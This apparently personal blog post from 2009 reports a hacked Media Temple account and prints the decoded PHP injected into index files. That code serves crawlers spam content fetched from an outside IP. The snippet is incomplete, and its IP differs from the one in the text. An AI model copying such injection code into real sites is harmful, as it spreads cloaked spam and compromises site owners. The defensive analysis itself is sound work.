Turned out that all of my index.php and index.html files were changed. Also a .htaccess files was added next to those files (or replaced if there was one before).
There was a piece of code added to the files:
When you base64-decode this you get (indentation by me):
if(stripos($_SERVER['HTTP_USER_AGENT'], 'google') or
stripos($_SERVER['HTTP_USER_AGENT'], 'yahoo') or
stripos($_SERVER['HTTP_USER_AGENT'], 'msn') or
$r = '';
@fputs($f, "GET /linkit/in.php?domain=" . urlencode($_SERVER["SERVER_NAME"]) .
"&useragent=" . urlencode($_SERVER['HTTP_USER_AGENT']) .
" HTTP/1.0\r\nHost: 126.96.36.199\r\n\r\n"))
while( $l = fread($f, 1024)) $r .= $l;
$p=strpos($r,"\r\n\r\n"); echo substr($r,$p+4);
I do not know much about PHP, but it seems that requests from search engine crawlers get special treatment and additional content is added to the page which is retrieved from the IP address 188.8.131.52. I guess the purpose is to add links to other sites to increase their page rank.
At least for my php sites this did not work however. The code addition invalided the files, presenting an error to the user for all requests.
Not sure how the hack was done. The media temple email suggested to change the ftp/ssh passwords. But I doubt that these passwords were compromised, because it seems that I am not the only one at media temple having the problem:
Let's wait what media temple has to say about this.
Update 27-Nov-2009: Media temple published some information on how the hack was done. Seems that the attacker got hold of passwords which have been stored as clear text. Read more about this in the media temple FAQ for this issue. There is also a how-to for fixing hacked accounts.